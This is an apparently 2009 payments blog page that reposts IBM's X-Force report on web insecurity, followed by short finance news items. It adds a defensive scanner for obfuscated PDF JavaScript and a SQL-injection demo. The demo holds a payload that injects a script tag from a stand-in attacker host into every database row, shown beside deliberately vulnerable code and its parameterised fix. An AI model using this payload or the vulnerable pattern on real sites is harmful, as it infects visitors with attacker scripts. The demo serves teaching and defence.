Thursday, August 27, 2009

IBM: Unprecedented State of Web Insecurity - No Such Thing as Safe Browsing




IBM's X-Force Trend and Risk Report has "officially" verified what the HomeATM Blog has been messaging for the last 16 months, which is basically that if you are going to conduct a financial transaction, it must be done outside the browser space...because browsers are unsafe.  You may have seen yesterday's post concerning the Top 11 eCommerce Paradigm Shifters which put HomeATM in Gear.  Combined with today's release of IBM's X-Force Report, you gotta like HomeATM's approach to securing online transactions, as we are the only company who does it "outside" the browser space (using our simple 2FA 3DES DUKPT E2EE).  :-)






The IBM X-Force Trend and Risk Report is produced twice per year: once at mid-year and once at year-end.  This report provides statistical information about all aspects of threats that affect web security, including software vulnerabilities and public exploitation, malware, spam, phishing, web-based threats, and general cyber criminal activity.

The reports are intended to help customers, fellow researchers, and the public at large understand the changing nature of the threat landscape and what might be done to mitigate it...like swipe vs. type!

The report also reveals what it describes as "an unprecedented state of Web insecurity as Web client, server, and content threats converge to create an untenable risk landscape."


IBM's researchers have clocked a 508% increase in the number of new malicious Web links, and the level of veiled (obfuscated) Web exploits, especially in PDF files, is now running at an all-time high.

The X-Force report notes an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines and mainstream news sites. PDF vulnerabilities disclosed in the first half of 2009 apparently surpassed disclosures from all of 2008.

“No one is to be trusted,” said X-Force Director Kris Lamb. “There is no such thing as safe browsing. We’ve reached a tipping point where every web site should be viewed as suspicious and every user is at risk.”

Editor's Note:  Sound like a familiar rant? I'm coming from help when I say: "Don't Type...Swipe!"  Want to register to read the report?  Here's the Link (PDF)    Also...here's IBM's Press Release:







ARMONK, N.Y. - 26 Aug 2009:


IBM (NYSE: IBM) today released results from its X-Force 2009 Mid-Year Trend and Risk Report. The report's findings show an unprecedented state of Web insecurity as Web client, server, and content threats converge to create an untenable risk landscape.



According to the report, there has been a 508 percent increase in the number of new malicious Web links discovered in the first half of 2009. This problem is no longer limited to malicious domains or untrusted Web sites. The X-Force report notes an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines and mainstream news sites. The ability to gain access and manipulate data remains the primary consequence of vulnerability exploitations.



The X-Force report also reveals that the level of veiled Web exploits, especially PDF files, is at an all-time high, pointing to increased sophistication of attackers. PDF vulnerabilities disclosed in the first half of 2009 surpassed disclosures from all of 2008. From Q1 to Q2 alone, the amount of suspicious, obfuscated or concealed content monitored by the IBM ISS Managed Security Services team nearly doubled.
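The "veiled" PDF content the report counts is usually a JavaScript hook (/OpenAction, /AA, /JS) whose name tokens are hex-escaped (/J#61vaScript) and whose payload stream sits behind a chain of /Filter decoders, so a naive string match never sees it. The scanner below is an added example written for this post, not IBM's or X-Force's tooling; the two PDF byte strings, the indicator list and the scoring thresholds are constructed for illustration. It undoes the name-object escaping first and only then looks for the hooks.

```python
"""Heuristic scanner for obfuscated ("veiled") PDF exploit content.
Added example for this post, not IBM/X-Force code. The PDF samples,
indicator set and score thresholds below are constructed assumptions."""
import re
from typing import Dict, List

# Name objects that carry drive-by logic far more often than honest documents do.
SUSPICIOUS_NAMES = {
    "/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
    "/EmbeddedFile", "/RichMedia", "/XFA",
}

_HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")   # PDF name hex escape, e.g. #61 -> 'a'
_NAME = re.compile(rb"/[A-Za-z][A-Za-z0-9]*")  # a PDF name token


def normalize_names(data: bytes) -> bytes:
    """Decode hex escapes so /J#61vaScript becomes /JavaScript.
    Attackers escape plain letters precisely to dodge substring matches."""
    return _HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> Dict[str, object]:
    """Return the indicators found in a PDF byte string plus a crude score."""
    plain = normalize_names(data)
    found: List[str] = [n.decode() for n in _NAME.findall(plain)]
    hits = sorted({n for n in found if n in SUSPICIOUS_NAMES})
    # Honest generators almost never hex-escape ASCII letters in names.
    escaped = len(_HEX_ESC.findall(data))
    # A /Filter *array* (several decoders stacked) is the usual payload wrapper.
    filter_chains = len(re.findall(rb"/Filter\s*\[", plain))
    score = 2 * len(hits) + (2 if escaped else 0) + filter_chains
    return {
        "indicators": hits,
        "hex_escaped_names": escaped,
        "filter_chains": filter_chains,
        "score": score,
        "suspicious": score >= 3,   # assumed threshold, tune on real corpora
    }


# Constructed samples (not real malware): a plain document and one that opens
# an escaped JavaScript action whose stream is behind two decoders.
BENIGN_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Length 5 /Filter /FlateDecode >>\nstream\nxxxxx\nendstream\nendobj\n"
)
VEILED_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n"
    b"3 0 obj\n<< /S /J#61vaScript /JS 4 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Length 5 /Filter [/FlateDecode /ASCIIHexDecode] >>\n"
    b"stream\nxxxxx\nendstream\nendobj\n"
)

if __name__ == "__main__":
    for label, pdf in (("benign", BENIGN_PDF), ("veiled", VEILED_PDF)):
        print(label, scan_pdf(pdf))
```

This is a triage heuristic, not a verdict: a genuine form with /AA validation scripts will score, and an exploit that builds the action object at runtime inside the stream will not. Run it as a first pass over mail attachments or proxy-captured PDFs and send anything with a non-empty indicator list to a sandbox.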





"The trends highlighted by the report seem to indicate that the web has finally taken on the characteristics of the Wild West where no one is to be trusted," said X-Force Director Kris Lamb. "There is no such thing as safe browsing today and it is no longer the case that only the red light district sites are responsible for malware. We've reached a tipping point where every Web site should be viewed as suspicious and every user is at risk. The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity."







Web security is no longer just a browser or client-side issue; criminals are leveraging insecure Web applications to target the users of legitimate Web sites. The X-Force report found a significant rise in Web application attacks with the intent to steal and manipulate data and take command and control of infected computers. For example, SQL injection attacks - attacks where criminals inject malicious code into legitimate Web sites, usually for the purpose of infecting visitors - rose 50 percent from Q4 2008 to Q1 2009 and then nearly doubled from Q1 to Q2.
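The SQL injection the press release describes is the mass-injection variant: the attacker does not steal the database, he appends a script tag to every stored page so that the legitimate site itself serves the drive-by to each visitor. The example below is added for this post (not from the report or from IBM) and shows the vulnerable pattern beside the fix; the articles table, the payload string and the attacker host are constructed assumptions, using Python's built-in sqlite3 in place of a real web stack.

```python
"""Mass SQL injection: vulnerable string-built UPDATE vs. parameterised UPDATE.
Added example for this post, not IBM/X-Force code. The schema, sample rows,
payload and attacker host are constructed for illustration."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed content table standing in for a site's CMS database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO articles(title, body) VALUES (?, ?)",
        [("Quarterly results", "<p>Revenue grew.</p>"),
         ("Security report", "<p>New malicious links up 508%.</p>")],
    )
    con.commit()
    return con


# Constructed payload: closes the string literal, stacks an UPDATE that tacks a
# script tag onto EVERY row, then comments out the rest of the original statement.
INJECTED_TAG = '<script src="http://attacker.invalid/x.js"></script>'
PAYLOAD = f"x'; UPDATE articles SET body = body || '{INJECTED_TAG}'; --"


def rename_vulnerable(con: sqlite3.Connection, article_id: int, new_title: str) -> None:
    """VULNERABLE: user input is spliced into SQL text and run as a script,
    so stacked statements from the input are executed too."""
    sql = f"UPDATE articles SET title = '{new_title}' WHERE id = {article_id}"
    con.executescript(sql)
    con.commit()


def rename_hardened(con: sqlite3.Connection, article_id: int, new_title: str) -> None:
    """HARDENED: the title travels as a bound parameter; it can never be parsed as SQL."""
    con.execute("UPDATE articles SET title = ? WHERE id = ?", (new_title, article_id))
    con.commit()


def infected_rows(con: sqlite3.Connection) -> int:
    """How many pages would now serve the attacker's script to visitors."""
    return con.execute(
        "SELECT COUNT(*) FROM articles WHERE body LIKE '%<script%'"
    ).fetchone()[0]


def stored_title(con: sqlite3.Connection, article_id: int) -> str:
    return con.execute("SELECT title FROM articles WHERE id = ?", (article_id,)).fetchone()[0]


def demo() -> tuple:
    """Run the same payload through both code paths; returns (infected, infected)."""
    vuln = make_db()
    rename_vulnerable(vuln, 1, PAYLOAD)
    safe = make_db()
    rename_hardened(safe, 1, PAYLOAD)
    return infected_rows(vuln), infected_rows(safe)


if __name__ == "__main__":
    print("infected pages (vulnerable, hardened):", demo())
```

Two things worth noticing when you run it. First, the vulnerable path poisons both rows with a single request, which is why the report ties injection to "infecting visitors" rather than to data theft. Second, the hardened path is not the whole fix: the attacker's HTML is now sitting in the title column as data, so the page that renders it must still output-encode, or you have traded SQL injection for stored cross-site scripting.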



"Two of the major themes for the first half of 2009 are the increase in sites hosting malware and the doubling of obfuscated Web attacks," Lamb said. "The trends seem to reveal a fundamental security weakness in the Web ecosystem where interoperability between browsers, plugins, content and server applications dramatically increase the complexity and risk. Criminals are taking advantage of the fact that there is no such thing as a safe browsing environment and are leveraging insecure Web applications to target legitimate Web site users."



The 2009 Midyear X-Force report also finds that:

















The X-Force research team has been cataloguing, analyzing and researching vulnerability disclosures since 1997. With more than 43,000 security vulnerabilities catalogued, it has the largest vulnerability database in the world. This unique database helps X-Force researchers to understand the dynamics that make up vulnerability discovery and disclosure.

IBM is one of the world's leading providers of risk and security solutions. Clients around the world partner with IBM to help reduce the complexities of security and strategically manage risk. IBM's experience and range of risk and security solutions -- from dedicated research, software, hardware, services and global Business Partner value -- are unsurpassed, helping clients secure business operations and implement company-wide, integrated risk management programs.



For more security trends and predictions from IBM, including graphical representations of security statistics, download the 2009 IBM X-Force Mid-Year Trend and Risk Report today.



About IBM

For more information about IBM, visit www.ibm.com...nuff said.




















Survey Says! 8 Million Brits Share PIN Numbers




Eight million Brits share PIN numbers - survey

Finextra: Over eight million Brits have handed over their Chip and PIN details to someone else in the last year, with a quarter of these falling victim to fraud, according to a survey for insurance firm LV=.

An online poll of 3002 people shows 20% have given out their card and PIN number - 85% of these in the past year - to someone else to make a purchase on their behalf or get money from a cash machine.

By far the worst offenders are younger people with over one in three of the under 35s admitting they have asked someone else to use one of their cards. The most common location for 'borrowed' cards to be used is at a cash machine.

Continue Reading at Finextra




Canadian Think Tank: Credit Card Companies Should be Federally Regulated




Canada urged to expand financial regulatory powers (Reuters)


"Credit card companies should be federally regulated"



OTTAWA, Aug 26 (Reuters) - Canada's banking regulator should license and approve all financial instruments available to investors in the country, even if they originate in the United States, a new report recommended on Wednesday.



The report by two economists at the Canadian Centre for Policy Alternatives, a left-leaning think tank, also urged the rapid creation of a single securities regulator in Canada to make sure officials can properly monitor markets and detect risky behavior or excesses before they get out of control.



A single financial markets watchdog, replacing the 13 regional regulators now in place, is a key ambition of Finance Minister Jim Flaherty and would bring under federal jurisdiction the "shadow" banking sector. That unregulated sector once accounted for nearly half of all Canadian borrowing and includes non-bank lenders as well as hedge funds and securitized debt vehicles.



Continue Reading at Reuters


















VisaNet, Redecard Shares Fall on Brazil Competition Concern





Aug. 26 (Bloomberg) -- Redecard SA and Cia. Brasileira de Meios de Pagamento, Brazil’s biggest debit- and credit-card payment processing companies, fell the most in at least two weeks after a newspaper reported the companies may face increased competition from state-controlled lenders.

Redecard, the processor of Mastercard Inc. payments, lost 1.7 percent to 26.25 reais in Sao Paulo trading for the biggest decline since Aug. 12. VisaNet, as the processor of Visa Inc. payments is known, slid 3.3 percent, the most since Aug. 6, to 16.81 reais.


Federally controlled banks Banco do Brasil SA and Caixa Economica Federal will “soon” start offering credit cards under their own brand as part of a government effort to increase competition, Brasilia-based Correio Braziliense newspaper reported today without saying where it obtained the information.

“The report adds to concern that these companies will face more competition in the future,” said Mariana Taddeo, an analyst with Link Investimentos in Sao Paulo.


Continue Reading




















